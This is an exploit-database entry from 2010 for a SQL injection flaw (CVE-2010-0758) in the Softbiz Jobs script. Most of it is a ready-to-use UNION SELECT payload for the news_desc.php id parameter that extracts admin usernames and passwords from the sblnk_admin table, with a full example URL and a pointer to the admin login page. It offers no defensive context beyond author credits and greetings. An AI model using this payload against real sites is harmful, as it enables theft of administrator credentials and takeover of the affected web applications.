Softbiz Jobs - 'news_desc' SQL Injection



EKU-ID: 18822 CVE: OSVDB-62649;CVE-2010-0758 OSVDB-ID:
Author: BAYBORA Published: 2010-02-22 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


Softbiz Jobs ( news_desc) SQL Injection Vulnerability

###########################
Author    : Baybora

Homepage  : http://www.1923turk.com

Blog      : http://baybora.wordpress.com/

Script    : softbizscripts

Download  : http://www.softbizscripts.com/

###########################

Exploat  :news_desc.php?id=SQL


-4+union+select+1,concat(username,0x3a,password),3,4,5+from+sblnk_admin--



http://server/news_desc.php?id=-4+union+select+1,concat(username,0x3a,password),3,4,5+from+sblnk_admin--


http://xxxx/admin


##############################################################
# Greetz: Manas58 - Gamoscu - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
##############################################################